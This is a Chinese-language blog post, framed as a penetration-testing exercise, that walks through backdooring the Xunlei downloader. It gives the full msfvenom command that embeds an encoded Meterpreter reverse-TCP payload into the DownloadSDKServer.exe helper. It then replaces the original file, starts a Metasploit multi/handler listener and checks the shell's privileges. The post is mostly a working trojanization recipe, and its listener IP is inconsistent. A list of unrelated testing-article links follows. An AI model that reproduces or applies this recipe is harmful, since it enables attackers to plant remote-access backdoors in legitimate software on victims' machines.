渗透测试-模拟黑客给软件加上后门获取shell

简介: 渗透测试-模拟黑客给软件加上后门获取shell

1.下载一个正常的软件

我们这里以迅雷为例

安装迅雷,打开软件,启动任务管理器,查看进程。

image.gif编辑

如图所示,在迅雷启动的同时,会自动启动一个迅雷下载引擎DodnloadSDKServer.exe *32软件,这时我们就可以在这个软件里面直入后门,也就是给子程序捆绑后门。

注:不要对主软件进行后门植入,以免造成软件不能正常使用。

2.将迅雷的子程序上传到kali系统的根目录下

image.gif编辑

3.对子程序注入payload后门程序

命令:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=4444 -b"\x00" -e x86/alpha_upper -i 10 -x DownloadSDKServer.exe -f exe -o /var/www/html/DownloadSDKServer.exe

image.gif编辑

如图所示,执行成功。

3.替换原有的子程序

将生成的软件下载下来并复制到文件夹里。

image.gif编辑

4.在MSF上启动handler开始监听后门程序

1.kali启动Metasploit软件

image.gif编辑

2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options

image.gif编辑

3.设置监听主机--kali  

set LHOSTS 192.168.1.109

image.gif编辑

4.开启run

5.启动迅雷

6.链接成功

image.gif编辑

7.查看权限

image.gif编辑

其它的就可以自己发挥了。

相关文章
|
8天前
|
敏捷开发 测试技术
探索性测试在软件质量保证中的角色与实践
在软件开发生命周期中,确保软件质量是一个不断挑战的过程。探索性测试(ET)作为一种灵活、启发式的测试方法,它与传统的脚本测试相比,提供了一种更为动态的测试方式。本文将探讨探索性测试的概念、优势以及如何在项目中有效实施ET,以提升软件质量。
12 2
|
8天前
|
测试技术 数据库 Python
在系统工程中,软件测试是一个至关重要的环节,它确保软件的质量、可靠性和性能。软件测试通常包括多个阶段,如单元测试、集成测试、系统测试和验收测试等。
在系统工程中,软件测试是一个至关重要的环节,它确保软件的质量、可靠性和性能。软件测试通常包括多个阶段,如单元测试、集成测试、系统测试和验收测试等。
|
1月前
|
监控 数据管理 测试技术
自动化测试:提升软件质量的关键
【6月更文挑战第19天】自动化测试在软件质量保障中至关重要,通过使用工具执行测试用例,提高效率、减少错误。关键技术包括测试框架(如Selenium)、测试脚本编写、测试数据管理和测试执行监控。虽面临脚本维护、数据管理等挑战,但自动化测试能提升软件质量,降低成本,加快交付速度,并将在未来持续影响软件行业。
|
1月前
|
机器学习/深度学习 敏捷开发 人工智能
自动化测试的崛起:如何利用AI提升软件质量
【6月更文挑战第20天】在软件开发的浪潮中,自动化测试已成为确保产品质量的关键工具。随着人工智能(AI)技术的飞速发展,其在自动化测试中的应用日益广泛,为测试流程带来了革命性的变化。本文将探讨AI如何优化测试用例生成、提高缺陷检测效率和预测潜在问题,从而显著提升软件测试的效率和准确性。
36 3
|
1月前
|
敏捷开发 测试技术 持续交付
探索式测试在软件质量保证中的角色与实践
【6月更文挑战第18天】探索式测试,一种灵活且高效的软件测试方法,正逐渐改变传统测试流程的面貌。本文将深入探讨探索式测试的核心概念、实施策略及其在现代软件开发生命周期中的应用价值。通过案例分析与实证研究,揭示探索式测试如何提升测试覆盖率,增强团队协作,并促进持续集成与交付。最终,文章旨在为读者提供一套实用的探索式测试框架,以支持其在软件质量保证活动中的有效运用。
16 3
|
13天前
|
监控 测试技术 持续交付
自动化测试在软件生命周期中的价值与挑战
本文通过深入分析自动化测试在软件开发过程中的应用,揭示其在提升效率、确保质量和减少成本方面的显著优势。同时,探讨了实施自动化测试时面临的技术复杂性、维护成本和技能缺乏等挑战,并提出了相应的解决方案。文章旨在为软件测试专业人士提供一个关于自动化测试实践的全面视角,帮助他们更好地规划和执行测试策略。
|
18天前
|
运维 监控 大数据
部署-Linux01,后端开发,运维开发,大数据开发,测试开发,后端软件,大数据系统,运维监控,测试程序,网页服务都要在Linux中进行部署
部署-Linux01,后端开发,运维开发,大数据开发,测试开发,后端软件,大数据系统,运维监控,测试程序,网页服务都要在Linux中进行部署
|
23天前
|
测试技术 UED
探索自动化测试框架:提升软件质量的利器
【6月更文挑战第29天】在软件开发的海洋中,自动化测试框架犹如一艘装备精良的船只,为追求高效与精准的软件质量保驾护航。本文将深入探讨自动化测试框架的核心组成、实施步骤及其在现代软件开发中的重要性,揭示如何通过这些框架来优化测试流程、缩短发布周期并确保产品质量。
21 0
|
24天前
|
测试技术
自动化测试在软件质量保证中的作用与挑战
随着软件开发周期的加速和复杂性的提升,传统的手动测试方法已无法满足高效率、低成本的需求。自动化测试作为解决方案之一,其重要性日益凸显。本文旨在探究自动化测试在确保软件质量方面的贡献及其面临的挑战。通过分析相关研究数据和案例,揭示自动化测试在提高测试覆盖率、降低长期成本以及加快交付速度等方面的优势。同时,探讨了自动化测试实施过程中的技术挑战、维护难题以及技能短缺等问题,并提出了相应的解决策略。
21 0
|
1月前
|
jenkins 测试技术 持续交付
探索自动化测试的边界:持续集成与软件质量的协同进化
随着软件开发节奏的加快,自动化测试成为确保软件质量和快速交付的关键。本文深入分析了持续集成(CI)在自动化测试中的作用,探讨了如何通过优化CI流程来提升软件测试效率和质量。文章首先概述了自动化测试的基本概念和重要性,接着详细讨论了在CI环境下实施自动化测试的策略,包括工具选择、测试用例设计、以及反馈机制建立等。最后,通过案例分析,展示了一个成功的自动化测试实践,旨在为读者提供一套可行的方法论,以促进其软件项目的质量保证工作。
22 0